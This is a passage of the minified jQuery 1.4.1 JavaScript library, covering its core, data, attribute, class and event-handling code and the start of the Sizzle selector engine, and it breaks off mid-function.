/*!
 * jQuery JavaScript Library v1.4.1
 * http://jquery.com/
 *
 * Copyright 2010, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2010, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Mon Jan 25 19:43:33 2010 -0500
 */
(function(z,v){function la(){if(!c.isReady){try{r.documentElement.doScroll("left")}catch(a){setTimeout(la,1);return}c.ready()}}function Ma(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,i){var j=a.length;if(typeof b==="object"){for(var n in b)X(a,n,b[n],f,e,d);return a}if(d!==v){f=!i&&f&&c.isFunction(d);for(n=0;n<j;n++)e(a[n],b,f?d.call(a[n],n,e(a[n],b)):d,i);return a}return j?
e(a[0],b):null}function J(){return(new Date).getTime()}function Y(){return false}function Z(){return true}function ma(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function na(a){var b,d=[],f=[],e=arguments,i,j,n,o,m,s,x=c.extend({},c.data(this,"events").live);if(!(a.button&&a.type==="click")){for(o in x){j=x[o];if(j.live===a.type||j.altLive&&c.inArray(a.type,j.altLive)>-1){i=j.data;i.beforeFilter&&i.beforeFilter[a.type]&&!i.beforeFilter[a.type](a)||f.push(j.selector)}else delete x[o]}i=c(a.target).closest(f,
a.currentTarget);m=0;for(s=i.length;m<s;m++)for(o in x){j=x[o];n=i[m].elem;f=null;if(i[m].selector===j.selector){if(j.live==="mouseenter"||j.live==="mouseleave")f=c(a.relatedTarget).closest(j.selector)[0];if(!f||f!==n)d.push({elem:n,fn:j})}}m=0;for(s=d.length;m<s;m++){i=d[m];a.currentTarget=i.elem;a.data=i.fn.data;if(i.fn.apply(i.elem,e)===false){b=false;break}}return b}}function oa(a,b){return"live."+(a?a+".":"")+b.replace(/\./g,"`").replace(/ /g,"&")}function pa(a){return!a||!a.parentNode||a.parentNode.nodeType===
11}function qa(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var f=c.data(a[d++]),e=c.data(this,f);if(f=f&&f.events){delete e.handle;e.events={};for(var i in f)for(var j in f[i])c.event.add(this,i,f[i][j],f[i][j].data)}}})}function ra(a,b,d){var f,e,i;if(a.length===1&&typeof a[0]==="string"&&a[0].length<512&&a[0].indexOf("<option")<0&&(c.support.checkClone||!sa.test(a[0]))){e=true;if(i=c.fragments[a[0]])if(i!==1)f=i}if(!f){b=b&&b[0]?b[0].ownerDocument||b[0]:r;f=b.createDocumentFragment();
c.clean(a,b,f,d)}if(e)c.fragments[a[0]]=i?f:1;return{fragment:f,cacheable:e}}function K(a,b){var d={};c.each(ta.concat.apply([],ta.slice(0,b)),function(){d[this]=a});return d}function ua(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var c=function(a,b){return new c.fn.init(a,b)},Na=z.jQuery,Oa=z.$,r=z.document,S,Pa=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,Qa=/^.[^:#\[\.,]*$/,Ra=/\S/,Sa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,Ta=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,O=navigator.userAgent,
va=false,P=[],L,$=Object.prototype.toString,aa=Object.prototype.hasOwnProperty,ba=Array.prototype.push,Q=Array.prototype.slice,wa=Array.prototype.indexOf;c.fn=c.prototype={init:function(a,b){var d,f;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(typeof a==="string")if((d=Pa.exec(a))&&(d[1]||!b))if(d[1]){f=b?b.ownerDocument||b:r;if(a=Ta.exec(a))if(c.isPlainObject(b)){a=[r.createElement(a[1])];c.fn.attr.call(a,b,true)}else a=[f.createElement(a[1])];else{a=ra([d[1]],
[f]);a=(a.cacheable?a.fragment.cloneNode(true):a.fragment).childNodes}}else{if(b=r.getElementById(d[2])){if(b.id!==d[2])return S.find(a);this.length=1;this[0]=b}this.context=r;this.selector=a;return this}else if(!b&&/^\w+$/.test(a)){this.selector=a;this.context=r;a=r.getElementsByTagName(a)}else return!b||b.jquery?(b||S).find(a):c(b).find(a);else if(c.isFunction(a))return S.ready(a);if(a.selector!==v){this.selector=a.selector;this.context=a.context}return c.isArray(a)?this.setArray(a):c.makeArray(a,
this)},selector:"",jquery:"1.4.1",length:0,size:function(){return this.length},toArray:function(){return Q.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,b,d){a=c(a||null);a.prevObject=this;a.context=this.context;if(b==="find")a.selector=this.selector+(this.selector?" ":"")+d;else if(b)a.selector=this.selector+"."+b+"("+d+")";return a},setArray:function(a){this.length=0;ba.apply(this,a);return this},each:function(a,b){return c.each(this,
a,b)},ready:function(a){c.bindReady();if(c.isReady)a.call(r,c);else P&&P.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(Q.apply(this,arguments),"slice",Q.call(arguments).join(","))},map:function(a){return this.pushStack(c.map(this,function(b,d){return a.call(b,d,b)}))},end:function(){return this.prevObject||c(null)},push:ba,sort:[].sort,splice:[].splice};
c.fn.init.prototype=c.fn;c.extend=c.fn.extend=function(){var a=arguments[0]||{},b=1,d=arguments.length,f=false,e,i,j,n;if(typeof a==="boolean"){f=a;a=arguments[1]||{};b=2}if(typeof a!=="object"&&!c.isFunction(a))a={};if(d===b){a=this;--b}for(;b<d;b++)if((e=arguments[b])!=null)for(i in e){j=a[i];n=e[i];if(a!==n)if(f&&n&&(c.isPlainObject(n)||c.isArray(n))){j=j&&(c.isPlainObject(j)||c.isArray(j))?j:c.isArray(n)?[]:{};a[i]=c.extend(f,j,n)}else if(n!==v)a[i]=n}return a};c.extend({noConflict:function(a){z.$=
Oa;if(a)z.jQuery=Na;return c},isReady:false,ready:function(){if(!c.isReady){if(!r.body)return setTimeout(c.ready,13);c.isReady=true;if(P){for(var a,b=0;a=P[b++];)a.call(r,c);P=null}c.fn.triggerHandler&&c(r).triggerHandler("ready")}},bindReady:function(){if(!va){va=true;if(r.readyState==="complete")return c.ready();if(r.addEventListener){r.addEventListener("DOMContentLoaded",L,false);z.addEventListener("load",c.ready,false)}else if(r.attachEvent){r.attachEvent("onreadystatechange",L);z.attachEvent("onload",
c.ready);var a=false;try{a=z.frameElement==null}catch(b){}r.documentElement.doScroll&&a&&la()}}},isFunction:function(a){return $.call(a)==="[object Function]"},isArray:function(a){return $.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||$.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!aa.call(a,"constructor")&&!aa.call(a.constructor.prototype,"isPrototypeOf"))return false;var b;for(b in a);return b===v||aa.call(a,b)},isEmptyObject:function(a){for(var b in a)return false;
return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return z.JSON&&z.JSON.parse?z.JSON.parse(a):(new Function("return "+a))();else c.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&Ra.test(a)){var b=r.getElementsByTagName("head")[0]||
r.documentElement,d=r.createElement("script");d.type="text/javascript";if(c.support.scriptEval)d.appendChild(r.createTextNode(a));else d.text=a;b.insertBefore(d,b.firstChild);b.removeChild(d)}},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,b,d){var f,e=0,i=a.length,j=i===v||c.isFunction(a);if(d)if(j)for(f in a){if(b.apply(a[f],d)===false)break}else for(;e<i;){if(b.apply(a[e++],d)===false)break}else if(j)for(f in a){if(b.call(a[f],f,a[f])===false)break}else for(d=
a[0];e<i&&b.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(Sa,"")},makeArray:function(a,b){b=b||[];if(a!=null)a.length==null||typeof a==="string"||c.isFunction(a)||typeof a!=="function"&&a.setInterval?ba.call(b,a):c.merge(b,a);return b},inArray:function(a,b){if(b.indexOf)return b.indexOf(a);for(var d=0,f=b.length;d<f;d++)if(b[d]===a)return d;return-1},merge:function(a,b){var d=a.length,f=0;if(typeof b.length==="number")for(var e=b.length;f<e;f++)a[d++]=b[f];else for(;b[f]!==
v;)a[d++]=b[f++];a.length=d;return a},grep:function(a,b,d){for(var f=[],e=0,i=a.length;e<i;e++)!d!==!b(a[e],e)&&f.push(a[e]);return f},map:function(a,b,d){for(var f=[],e,i=0,j=a.length;i<j;i++){e=b(a[i],i,d);if(e!=null)f[f.length]=e}return f.concat.apply([],f)},guid:1,proxy:function(a,b,d){if(arguments.length===2)if(typeof b==="string"){d=a;a=d[b];b=v}else if(b&&!c.isFunction(b)){d=b;b=v}if(!b&&a)b=function(){return a.apply(d||this,arguments)};if(a)b.guid=a.guid=a.guid||b.guid||c.guid++;return b},
uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});O=c.uaMatch(O);if(O.browser){c.browser[O.browser]=true;c.browser.version=O.version}if(c.browser.webkit)c.browser.safari=true;if(wa)c.inArray=function(a,b){return wa.call(b,a)};S=c(r);if(r.addEventListener)L=function(){r.removeEventListener("DOMContentLoaded",
L,false);c.ready()};else if(r.attachEvent)L=function(){if(r.readyState==="complete"){r.detachEvent("onreadystatechange",L);c.ready()}};(function(){c.support={};var a=r.documentElement,b=r.createElement("script"),d=r.createElement("div"),f="script"+J();d.style.display="none";d.innerHTML="   <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var e=d.getElementsByTagName("*"),i=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!i)){c.support=
{leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(i.getAttribute("style")),hrefNormalized:i.getAttribute("href")==="/a",opacity:/^0.55$/.test(i.style.opacity),cssFloat:!!i.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:r.createElement("select").appendChild(r.createElement("option")).selected,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};
b.type="text/javascript";try{b.appendChild(r.createTextNode("window."+f+"=1;"))}catch(j){}a.insertBefore(b,a.firstChild);if(z[f]){c.support.scriptEval=true;delete z[f]}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function n(){c.support.noCloneEvent=false;d.detachEvent("onclick",n)});d.cloneNode(true).fireEvent("onclick")}d=r.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=r.createDocumentFragment();a.appendChild(d.firstChild);
c.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;c(function(){var n=r.createElement("div");n.style.width=n.style.paddingLeft="1px";r.body.appendChild(n);c.boxModel=c.support.boxModel=n.offsetWidth===2;r.body.removeChild(n).style.display="none"});a=function(n){var o=r.createElement("div");n="on"+n;var m=n in o;if(!m){o.setAttribute(n,"return;");m=typeof o[n]==="function"}return m};c.support.submitBubbles=a("submit");c.support.changeBubbles=a("change");a=b=d=e=i=null}})();c.props=
{"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var G="jQuery"+J(),Ua=0,xa={},Va={};c.extend({cache:{},expando:G,noData:{embed:true,object:true,applet:true},data:function(a,b,d){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==z?xa:a;var f=a[G],e=c.cache;if(!b&&!f)return null;f||(f=++Ua);if(typeof b==="object"){a[G]=f;e=e[f]=c.extend(true,
{},b)}else e=e[f]?e[f]:typeof d==="undefined"?Va:(e[f]={});if(d!==v){a[G]=f;e[b]=d}return typeof b==="string"?e[b]:e}},removeData:function(a,b){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==z?xa:a;var d=a[G],f=c.cache,e=f[d];if(b){if(e){delete e[b];c.isEmptyObject(e)&&c.removeData(a)}}else{try{delete a[G]}catch(i){a.removeAttribute&&a.removeAttribute(G)}delete f[d]}}}});c.fn.extend({data:function(a,b){if(typeof a==="undefined"&&this.length)return c.data(this[0]);else if(typeof a==="object")return this.each(function(){c.data(this,
a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(b===v){var f=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(f===v&&this.length)f=c.data(this[0],a);return f===v&&d[1]?this.data(d[0]):f}else return this.trigger("setData"+d[1]+"!",[d[0],b]).each(function(){c.data(this,a,b)})},removeData:function(a){return this.each(function(){c.removeData(this,a)})}});c.extend({queue:function(a,b,d){if(a){b=(b||"fx")+"queue";var f=c.data(a,b);if(!d)return f||[];if(!f||c.isArray(d))f=c.data(a,b,c.makeArray(d));else f.push(d);
return f}},dequeue:function(a,b){b=b||"fx";var d=c.queue(a,b),f=d.shift();if(f==="inprogress")f=d.shift();if(f){b==="fx"&&d.unshift("inprogress");f.call(a,function(){c.dequeue(a,b)})}}});c.fn.extend({queue:function(a,b){if(typeof a!=="string"){b=a;a="fx"}if(b===v)return c.queue(this[0],a);return this.each(function(){var d=c.queue(this,a,b);a==="fx"&&d[0]!=="inprogress"&&c.dequeue(this,a)})},dequeue:function(a){return this.each(function(){c.dequeue(this,a)})},delay:function(a,b){a=c.fx?c.fx.speeds[a]||
a:a;b=b||"fx";return this.queue(b,function(){var d=this;setTimeout(function(){c.dequeue(d,b)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var ya=/[\n\t]/g,ca=/\s+/,Wa=/\r/g,Xa=/href|src|style/,Ya=/(button|input)/i,Za=/(button|input|object|select|textarea)/i,$a=/^(a|area)$/i,za=/radio|checkbox/;c.fn.extend({attr:function(a,b){return X(this,a,b,true,c.attr)},removeAttr:function(a){return this.each(function(){c.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(c.isFunction(a))return this.each(function(o){var m=
c(this);m.addClass(a.call(this,o,m.attr("class")))});if(a&&typeof a==="string")for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1)if(e.className)for(var i=" "+e.className+" ",j=0,n=b.length;j<n;j++){if(i.indexOf(" "+b[j]+" ")<0)e.className+=" "+b[j]}else e.className=a}return this},removeClass:function(a){if(c.isFunction(a))return this.each(function(o){var m=c(this);m.removeClass(a.call(this,o,m.attr("class")))});if(a&&typeof a==="string"||a===v)for(var b=(a||"").split(ca),
d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var i=(" "+e.className+" ").replace(ya," "),j=0,n=b.length;j<n;j++)i=i.replace(" "+b[j]+" "," ");e.className=i.substring(1,i.length-1)}else e.className=""}return this},toggleClass:function(a,b){var d=typeof a,f=typeof b==="boolean";if(c.isFunction(a))return this.each(function(e){var i=c(this);i.toggleClass(a.call(this,e,i.attr("class"),b),b)});return this.each(function(){if(d==="string")for(var e,i=0,j=c(this),n=b,o=
a.split(ca);e=o[i++];){n=f?n:!j.hasClass(e);j[n?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&c.data(this,"__className__",this.className);this.className=this.className||a===false?"":c.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var b=0,d=this.length;b<d;b++)if((" "+this[b].className+" ").replace(ya," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===v){var b=this[0];if(b){if(c.nodeName(b,"option"))return(b.attributes.value||
{}).specified?b.value:b.text;if(c.nodeName(b,"select")){var d=b.selectedIndex,f=[],e=b.options;b=b.type==="select-one";if(d<0)return null;var i=b?d:0;for(d=b?d+1:e.length;i<d;i++){var j=e[i];if(j.selected){a=c(j).val();if(b)return a;f.push(a)}}return f}if(za.test(b.type)&&!c.support.checkOn)return b.getAttribute("value")===null?"on":b.value;return(b.value||"").replace(Wa,"")}return v}var n=c.isFunction(a);return this.each(function(o){var m=c(this),s=a;if(this.nodeType===1){if(n)s=a.call(this,o,m.val());
if(typeof s==="number")s+="";if(c.isArray(s)&&za.test(this.type))this.checked=c.inArray(m.val(),s)>=0;else if(c.nodeName(this,"select")){var x=c.makeArray(s);c("option",this).each(function(){this.selected=c.inArray(c(this).val(),x)>=0});if(!x.length)this.selectedIndex=-1}else this.value=s}})}});c.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,b,d,f){if(!a||a.nodeType===3||a.nodeType===8)return v;if(f&&b in c.attrFn)return c(a)[b](d);
f=a.nodeType!==1||!c.isXMLDoc(a);var e=d!==v;b=f&&c.props[b]||b;if(a.nodeType===1){var i=Xa.test(b);if(b in a&&f&&!i){if(e){b==="type"&&Ya.test(a.nodeName)&&a.parentNode&&c.error("type property can't be changed");a[b]=d}if(c.nodeName(a,"form")&&a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b==="tabIndex")return(b=a.getAttributeNode("tabIndex"))&&b.specified?b.value:Za.test(a.nodeName)||$a.test(a.nodeName)&&a.href?0:v;return a[b]}if(!c.support.style&&f&&b==="style"){if(e)a.style.cssText=
""+d;return a.style.cssText}e&&a.setAttribute(b,""+d);a=!c.support.hrefNormalized&&f&&i?a.getAttribute(b,2):a.getAttribute(b);return a===null?v:a}return c.style(a,b,d)}});var ab=function(a){return a.replace(/[^\w\s\.\|`]/g,function(b){return"\\"+b})};c.event={add:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==z&&!a.frameElement)a=z;if(!d.guid)d.guid=c.guid++;if(f!==v){d=c.proxy(d);d.data=f}var e=c.data(a,"events")||c.data(a,"events",{}),i=c.data(a,"handle"),j;if(!i){j=
function(){return typeof c!=="undefined"&&!c.event.triggered?c.event.handle.apply(j.elem,arguments):v};i=c.data(a,"handle",j)}if(i){i.elem=a;b=b.split(/\s+/);for(var n,o=0;n=b[o++];){var m=n.split(".");n=m.shift();if(o>1){d=c.proxy(d);if(f!==v)d.data=f}d.type=m.slice(0).sort().join(".");var s=e[n],x=this.special[n]||{};if(!s){s=e[n]={};if(!x.setup||x.setup.call(a,f,m,d)===false)if(a.addEventListener)a.addEventListener(n,i,false);else a.attachEvent&&a.attachEvent("on"+n,i)}if(x.add)if((m=x.add.call(a,
d,f,m,s))&&c.isFunction(m)){m.guid=m.guid||d.guid;m.data=m.data||d.data;m.type=m.type||d.type;d=m}s[d.guid]=d;this.global[n]=true}a=null}}},global:{},remove:function(a,b,d){if(!(a.nodeType===3||a.nodeType===8)){var f=c.data(a,"events"),e,i,j;if(f){if(b===v||typeof b==="string"&&b.charAt(0)===".")for(i in f)this.remove(a,i+(b||""));else{if(b.type){d=b.handler;b=b.type}b=b.split(/\s+/);for(var n=0;i=b[n++];){var o=i.split(".");i=o.shift();var m=!o.length,s=c.map(o.slice(0).sort(),ab);s=new RegExp("(^|\\.)"+
s.join("\\.(?:.*\\.)?")+"(\\.|$)");var x=this.special[i]||{};if(f[i]){if(d){j=f[i][d.guid];delete f[i][d.guid]}else for(var A in f[i])if(m||s.test(f[i][A].type))delete f[i][A];x.remove&&x.remove.call(a,o,j);for(e in f[i])break;if(!e){if(!x.teardown||x.teardown.call(a,o)===false)if(a.removeEventListener)a.removeEventListener(i,c.data(a,"handle"),false);else a.detachEvent&&a.detachEvent("on"+i,c.data(a,"handle"));e=null;delete f[i]}}}}for(e in f)break;if(!e){if(A=c.data(a,"handle"))A.elem=null;c.removeData(a,
"events");c.removeData(a,"handle")}}}},trigger:function(a,b,d,f){var e=a.type||a;if(!f){a=typeof a==="object"?a[G]?a:c.extend(c.Event(e),a):c.Event(e);if(e.indexOf("!")>=0){a.type=e=e.slice(0,-1);a.exclusive=true}if(!d){a.stopPropagation();this.global[e]&&c.each(c.cache,function(){this.events&&this.events[e]&&c.event.trigger(a,b,this.handle.elem)})}if(!d||d.nodeType===3||d.nodeType===8)return v;a.result=v;a.target=d;b=c.makeArray(b);b.unshift(a)}a.currentTarget=d;(f=c.data(d,"handle"))&&f.apply(d,
b);f=d.parentNode||d.ownerDocument;try{if(!(d&&d.nodeName&&c.noData[d.nodeName.toLowerCase()]))if(d["on"+e]&&d["on"+e].apply(d,b)===false)a.result=false}catch(i){}if(!a.isPropagationStopped()&&f)c.event.trigger(a,b,f,true);else if(!a.isDefaultPrevented()){d=a.target;var j;if(!(c.nodeName(d,"a")&&e==="click")&&!(d&&d.nodeName&&c.noData[d.nodeName.toLowerCase()])){try{if(d[e]){if(j=d["on"+e])d["on"+e]=null;this.triggered=true;d[e]()}}catch(n){}if(j)d["on"+e]=j;this.triggered=false}}},handle:function(a){var b,
d;a=arguments[0]=c.event.fix(a||z.event);a.currentTarget=this;d=a.type.split(".");a.type=d.shift();b=!d.length&&!a.exclusive;var f=new RegExp("(^|\\.)"+d.slice(0).sort().join("\\.(?:.*\\.)?")+"(\\.|$)");d=(c.data(this,"events")||{})[a.type];for(var e in d){var i=d[e];if(b||f.test(i.type)){a.handler=i;a.data=i.data;i=i.apply(this,arguments);if(i!==v){a.result=i;if(i===false){a.preventDefault();a.stopPropagation()}}if(a.isImmediatePropagationStopped())break}}return a.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),
fix:function(a){if(a[G])return a;var b=a;a=c.Event(b);for(var d=this.props.length,f;d;){f=this.props[--d];a[f]=b[f]}if(!a.target)a.target=a.srcElement||r;if(a.target.nodeType===3)a.target=a.target.parentNode;if(!a.relatedTarget&&a.fromElement)a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement;if(a.pageX==null&&a.clientX!=null){b=r.documentElement;d=r.body;a.pageX=a.clientX+(b&&b.scrollLeft||d&&d.scrollLeft||0)-(b&&b.clientLeft||d&&d.clientLeft||0);a.pageY=a.clientY+(b&&b.scrollTop||
d&&d.scrollTop||0)-(b&&b.clientTop||d&&d.clientTop||0)}if(!a.which&&(a.charCode||a.charCode===0?a.charCode:a.keyCode))a.which=a.charCode||a.keyCode;if(!a.metaKey&&a.ctrlKey)a.metaKey=a.ctrlKey;if(!a.which&&a.button!==v)a.which=a.button&1?1:a.button&2?3:a.button&4?2:0;return a},guid:1E8,proxy:c.proxy,special:{ready:{setup:c.bindReady,teardown:c.noop},live:{add:function(a,b){c.extend(a,b||{});a.guid+=b.selector+b.live;b.liveProxy=a;c.event.add(this,b.live,na,b)},remove:function(a){if(a.length){var b=
0,d=new RegExp("(^|\\.)"+a[0]+"(\\.|$)");c.each(c.data(this,"events").live||{},function(){d.test(this.type)&&b++});b<1&&c.event.remove(this,a[0],na)}},special:{}},beforeunload:{setup:function(a,b,d){if(this.setInterval)this.onbeforeunload=d;return false},teardown:function(a,b){if(this.onbeforeunload===b)this.onbeforeunload=null}}}};c.Event=function(a){if(!this.preventDefault)return new c.Event(a);if(a&&a.type){this.originalEvent=a;this.type=a.type}else this.type=a;this.timeStamp=J();this[G]=true};
c.Event.prototype={preventDefault:function(){this.isDefaultPrevented=Z;var a=this.originalEvent;if(a){a.preventDefault&&a.preventDefault();a.returnValue=false}},stopPropagation:function(){this.isPropagationStopped=Z;var a=this.originalEvent;if(a){a.stopPropagation&&a.stopPropagation();a.cancelBubble=true}},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=Z;this.stopPropagation()},isDefaultPrevented:Y,isPropagationStopped:Y,isImmediatePropagationStopped:Y};var Aa=function(a){for(var b=
a.relatedTarget;b&&b!==this;)try{b=b.parentNode}catch(d){break}if(b!==this){a.type=a.data;c.event.handle.apply(this,arguments)}},Ba=function(a){a.type=a.data;c.event.handle.apply(this,arguments)};c.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){c.event.special[a]={setup:function(d){c.event.add(this,b,d&&d.selector?Ba:Aa,a)},teardown:function(d){c.event.remove(this,b,d&&d.selector?Ba:Aa)}}});if(!c.support.submitBubbles)c.event.special.submit={setup:function(a,b,d){if(this.nodeName.toLowerCase()!==
"form"){c.event.add(this,"click.specialSubmit."+d.guid,function(f){var e=f.target,i=e.type;if((i==="submit"||i==="image")&&c(e).closest("form").length)return ma("submit",this,arguments)});c.event.add(this,"keypress.specialSubmit."+d.guid,function(f){var e=f.target,i=e.type;if((i==="text"||i==="password")&&c(e).closest("form").length&&f.keyCode===13)return ma("submit",this,arguments)})}else return false},remove:function(a,b){c.event.remove(this,"click.specialSubmit"+(b?"."+b.guid:""));c.event.remove(this,
"keypress.specialSubmit"+(b?"."+b.guid:""))}};if(!c.support.changeBubbles){var da=/textarea|input|select/i;function Ca(a){var b=a.type,d=a.value;if(b==="radio"||b==="checkbox")d=a.checked;else if(b==="select-multiple")d=a.selectedIndex>-1?c.map(a.options,function(f){return f.selected}).join("-"):"";else if(a.nodeName.toLowerCase()==="select")d=a.selectedIndex;return d}function ea(a,b){var d=a.target,f,e;if(!(!da.test(d.nodeName)||d.readOnly)){f=c.data(d,"_change_data");e=Ca(d);if(a.type!=="focusout"||
d.type!=="radio")c.data(d,"_change_data",e);if(!(f===v||e===f))if(f!=null||e){a.type="change";return c.event.trigger(a,b,d)}}}c.event.special.change={filters:{focusout:ea,click:function(a){var b=a.target,d=b.type;if(d==="radio"||d==="checkbox"||b.nodeName.toLowerCase()==="select")return ea.call(this,a)},keydown:function(a){var b=a.target,d=b.type;if(a.keyCode===13&&b.nodeName.toLowerCase()!=="textarea"||a.keyCode===32&&(d==="checkbox"||d==="radio")||d==="select-multiple")return ea.call(this,a)},beforeactivate:function(a){a=
a.target;a.nodeName.toLowerCase()==="input"&&a.type==="radio"&&c.data(a,"_change_data",Ca(a))}},setup:function(a,b,d){for(var f in T)c.event.add(this,f+".specialChange."+d.guid,T[f]);return da.test(this.nodeName)},remove:function(a,b){for(var d in T)c.event.remove(this,d+".specialChange"+(b?"."+b.guid:""),T[d]);return da.test(this.nodeName)}};var T=c.event.special.change.filters}r.addEventListener&&c.each({focus:"focusin",blur:"focusout"},function(a,b){function d(f){f=c.event.fix(f);f.type=b;return c.event.handle.call(this,
f)}c.event.special[b]={setup:function(){this.addEventListener(a,d,true)},teardown:function(){this.removeEventListener(a,d,true)}}});c.each(["bind","one"],function(a,b){c.fn[b]=function(d,f,e){if(typeof d==="object"){for(var i in d)this[b](i,f,d[i],e);return this}if(c.isFunction(f)){e=f;f=v}var j=b==="one"?c.proxy(e,function(n){c(this).unbind(n,j);return e.apply(this,arguments)}):e;return d==="unload"&&b!=="one"?this.one(d,f,e):this.each(function(){c.event.add(this,d,j,f)})}});c.fn.extend({unbind:function(a,
b){if(typeof a==="object"&&!a.preventDefault){for(var d in a)this.unbind(d,a[d]);return this}return this.each(function(){c.event.remove(this,a,b)})},trigger:function(a,b){return this.each(function(){c.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0]){a=c.Event(a);a.preventDefault();a.stopPropagation();c.event.trigger(a,b,this[0]);return a.result}},toggle:function(a){for(var b=arguments,d=1;d<b.length;)c.proxy(a,b[d++]);return this.click(c.proxy(a,function(f){var e=(c.data(this,"lastToggle"+
a.guid)||0)%d;c.data(this,"lastToggle"+a.guid,e+1);f.preventDefault();return b[e].apply(this,arguments)||false}))},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}});c.each(["live","die"],function(a,b){c.fn[b]=function(d,f,e){var i,j=0;if(c.isFunction(f)){e=f;f=v}for(d=(d||"").split(/\s+/);(i=d[j++])!=null;){i=i==="focus"?"focusin":i==="blur"?"focusout":i==="hover"?d.push("mouseleave")&&"mouseenter":i;b==="live"?c(this.context).bind(oa(i,this.selector),{data:f,selector:this.selector,
live:i},e):c(this.context).unbind(oa(i,this.selector),e?{guid:e.guid+this.selector+i}:null)}return this}});c.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error".split(" "),function(a,b){c.fn[b]=function(d){return d?this.bind(b,d):this.trigger(b)};if(c.attrFn)c.attrFn[b]=true});z.attachEvent&&!z.addEventListener&&z.attachEvent("onunload",function(){for(var a in c.cache)if(c.cache[a].handle)try{c.event.remove(c.cache[a].handle.elem)}catch(b){}});
(function(){function a(g){for(var h="",k,l=0;g[l];l++){k=g[l];if(k.nodeType===3||k.nodeType===4)h+=k.nodeValue;else if(k.nodeType!==8)h+=a(k.childNodes)}return h}function b(g,h,k,l,q,p){q=0;for(var u=l.length;q<u;q++){var t=l[q];if(t){t=t[g];for(var y=false;t;){if(t.sizcache===k){y=l[t.sizset];break}if(t.nodeType===1&&!p){t.sizcache=k;t.sizset=q}if(t.nodeName.toLowerCase()===h){y=t;break}t=t[g]}l[q]=y}}}function d(g,h,k,l,q,p){q=0;for(var u=l.length;q<u;q++){var t=l[q];if(t){t=t[g];for(var y=false;t;){if(t.sizcache===
